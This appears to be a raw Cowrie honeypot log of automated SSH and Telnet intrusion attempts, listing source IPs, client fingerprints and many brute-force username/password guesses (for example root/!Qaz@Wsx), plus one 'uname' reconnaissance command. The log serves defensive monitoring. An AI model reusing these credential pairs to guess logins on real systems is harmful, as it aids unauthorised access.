{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:44:59.013861Z","src_ip":"194.233.79.134","session":"c3ddecd89173"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:45:00.452564Z","src_ip":"194.233.79.134","session":"c3ddecd89173"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T01:45:00.453266Z","src_ip":"194.233.79.134","session":"c3ddecd89173"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:45:02.004723Z","src_ip":"194.233.79.134","session":"c3ddecd89173"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:45:02.006725Z","src_ip":"194.233.79.134","session":"c3ddecd89173"}
{"eventid":"cowrie.login.success","username":"root","password":"mdak3allouch*","message":"login attempt [root/mdak3allouch*] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:45:11.809260Z","src_ip":"198.98.53.110","session":"80df3f0df679"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:45:11.828130Z","src_ip":"198.98.53.110","session":"80df3f0df679"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:46:11.444585Z","src_ip":"212.227.125.160","session":"aa2403397ae7"}
{"eventid":"cowrie.session.closed","duration":180.11686849594116,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:46:11.449732Z","src_ip":"212.227.125.160","session":"aa2403397ae7"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":46966,"dst_ip":"1.2.3.4","dst_port":22,"session":"73010234b90f","protocol":"ssh","message":"New connection: 194.233.79.134:46966 (1.2.3.4:22) [session: 73010234b90f]","sensor":"my-vps","timestamp":"2025-08-28T01:46:38.973772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:46:39.301334Z","src_ip":"194.233.79.134","session":"73010234b90f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:46:39.302082Z","src_ip":"194.233.79.134","session":"73010234b90f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T01:46:42.788881Z","src_ip":"194.233.79.134","session":"73010234b90f"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:46:44.472924Z","src_ip":"194.233.79.134","session":"73010234b90f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56604,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3fbea68e762","protocol":"ssh","message":"New connection: 217.72.205.35:56604 (1.2.3.4:22) [session: f3fbea68e762]","sensor":"my-vps","timestamp":"2025-08-28T01:46:47.734104Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:46:47.735229Z","src_ip":"217.72.205.35","session":"f3fbea68e762"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33455,"dst_ip":"1.2.3.4","dst_port":23,"session":"606bf2cd25c6","protocol":"telnet","message":"New connection: 212.227.125.160:33455 (1.2.3.4:23) [session: 606bf2cd25c6]","sensor":"my-vps","timestamp":"2025-08-28T01:46:50.461924Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33461,"dst_ip":"1.2.3.4","dst_port":23,"session":"ba2ab8fbcc41","protocol":"telnet","message":"New connection: 212.227.125.160:33461 (1.2.3.4:23) [session: ba2ab8fbcc41]","sensor":"my-vps","timestamp":"2025-08-28T01:46:51.493075Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45555,"dst_ip":"1.2.3.4","dst_port":23,"session":"f1839a98c93b","protocol":"telnet","message":"New connection: 212.227.235.229:45555 (1.2.3.4:23) [session: f1839a98c93b]","sensor":"my-vps","timestamp":"2025-08-28T01:47:12.945716Z"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":37270,"dst_ip":"1.2.3.4","dst_port":22,"session":"82582f374f18","protocol":"ssh","message":"New connection: 139.19.117.131:37270 (1.2.3.4:22) [session: 82582f374f18]","sensor":"my-vps","timestamp":"2025-08-28T01:47:13.595004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:47:13.597291Z","src_ip":"139.19.117.131","session":"82582f374f18"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T01:47:13.615405Z","src_ip":"139.19.117.131","session":"82582f374f18"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","sensor":"my-vps","timestamp":"2025-08-28T01:47:13.652192Z","src_ip":"139.19.117.131","session":"82582f374f18"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:47:13.652800Z","src_ip":"139.19.117.131","session":"82582f374f18"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","sensor":"my-vps","timestamp":"2025-08-28T01:47:13.671154Z","src_ip":"139.19.117.131","session":"82582f374f18"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:47:13.671804Z","src_ip":"139.19.117.131","session":"82582f374f18"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:47:23.595340Z","src_ip":"139.19.117.131","session":"82582f374f18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44198,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce265b233863","protocol":"ssh","message":"New connection: 212.227.235.229:44198 (1.2.3.4:22) [session: ce265b233863]","sensor":"my-vps","timestamp":"2025-08-28T01:47:33.978326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:47:33.979115Z","src_ip":"212.227.235.229","session":"ce265b233863"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T01:47:34.087729Z","src_ip":"212.227.235.229","session":"ce265b233863"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T01:47:34.414295Z","src_ip":"212.227.235.229","session":"ce265b233863"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:47:35.524055Z","src_ip":"212.227.235.229","session":"ce265b233863"}
{"eventid":"cowrie.session.closed","duration":31.326799631118774,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:47:44.272443Z","src_ip":"212.227.235.229","session":"f1839a98c93b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52115,"dst_ip":"1.2.3.4","dst_port":23,"session":"3a6be0ef57db","protocol":"telnet","message":"New connection: 212.227.125.160:52115 (1.2.3.4:23) [session: 3a6be0ef57db]","sensor":"my-vps","timestamp":"2025-08-28T01:47:53.548097Z"}
{"eventid":"cowrie.session.closed","duration":12.773133754730225,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:48:06.320131Z","src_ip":"212.227.125.160","session":"3a6be0ef57db"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":43854,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cbe669d6a4a","protocol":"ssh","message":"New connection: 194.233.79.134:43854 (1.2.3.4:22) [session: 8cbe669d6a4a]","sensor":"my-vps","timestamp":"2025-08-28T01:48:16.750855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:48:17.237123Z","src_ip":"194.233.79.134","session":"8cbe669d6a4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:48:17.237893Z","src_ip":"194.233.79.134","session":"8cbe669d6a4a"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:48:19.442016Z","src_ip":"194.233.79.134","session":"8cbe669d6a4a"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:48:20.696687Z","src_ip":"194.233.79.134","session":"8cbe669d6a4a"}
{"eventid":"cowrie.session.closed","duration":120.00353050231934,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:48:50.465371Z","src_ip":"212.227.125.160","session":"606bf2cd25c6"}
{"eventid":"cowrie.session.closed","duration":120.00235605239868,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:48:51.495352Z","src_ip":"212.227.125.160","session":"ba2ab8fbcc41"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":54700,"dst_ip":"1.2.3.4","dst_port":22,"session":"f27f7465f50f","protocol":"ssh","message":"New connection: 194.233.79.134:54700 (1.2.3.4:22) [session: f27f7465f50f]","sensor":"my-vps","timestamp":"2025-08-28T01:49:40.680522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:49:41.255004Z","src_ip":"194.233.79.134","session":"f27f7465f50f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:49:41.255701Z","src_ip":"194.233.79.134","session":"f27f7465f50f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:49:42.351039Z","src_ip":"194.233.79.134","session":"f27f7465f50f"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:49:43.683305Z","src_ip":"194.233.79.134","session":"f27f7465f50f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63081,"dst_ip":"1.2.3.4","dst_port":22,"session":"90feb8ae34a6","protocol":"ssh","message":"New connection: 212.227.235.229:63081 (1.2.3.4:22) [session: 90feb8ae34a6]","sensor":"my-vps","timestamp":"2025-08-28T01:50:35.626445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:50:35.627617Z","src_ip":"212.227.235.229","session":"90feb8ae34a6"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:50:35.758570Z","src_ip":"212.227.235.229","session":"90feb8ae34a6"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456qwerty","message":"login attempt [user/123456qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T01:50:36.363850Z","src_ip":"212.227.235.229","session":"90feb8ae34a6"}
{"eventid":"cowrie.login.failed","username":"user","password":"tobias","message":"login attempt [user/tobias] failed","sensor":"my-vps","timestamp":"2025-08-28T01:50:37.512963Z","src_ip":"212.227.235.229","session":"90feb8ae34a6"}
{"eventid":"cowrie.login.failed","username":"user","password":"tatyana","message":"login attempt [user/tatyana] failed","sensor":"my-vps","timestamp":"2025-08-28T01:50:38.648159Z","src_ip":"212.227.235.229","session":"90feb8ae34a6"}
{"eventid":"cowrie.login.failed","username":"user","password":"stuff","message":"login attempt [user/stuff] failed","sensor":"my-vps","timestamp":"2025-08-28T01:50:39.803238Z","src_ip":"212.227.235.229","session":"90feb8ae34a6"}
{"eventid":"cowrie.login.failed","username":"user","password":"spectrum","message":"login attempt [user/spectrum] failed","sensor":"my-vps","timestamp":"2025-08-28T01:50:40.946387Z","src_ip":"212.227.235.229","session":"90feb8ae34a6"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:50:42.102257Z","src_ip":"212.227.235.229","session":"90feb8ae34a6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.240.46","src_port":60958,"dst_ip":"1.2.3.4","dst_port":22,"session":"b216fe404a4a","protocol":"ssh","message":"New connection: 77.83.240.46:60958 (1.2.3.4:22) [session: b216fe404a4a]","sensor":"my-vps","timestamp":"2025-08-28T01:51:25.945772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:51:25.946455Z","src_ip":"77.83.240.46","session":"b216fe404a4a"}
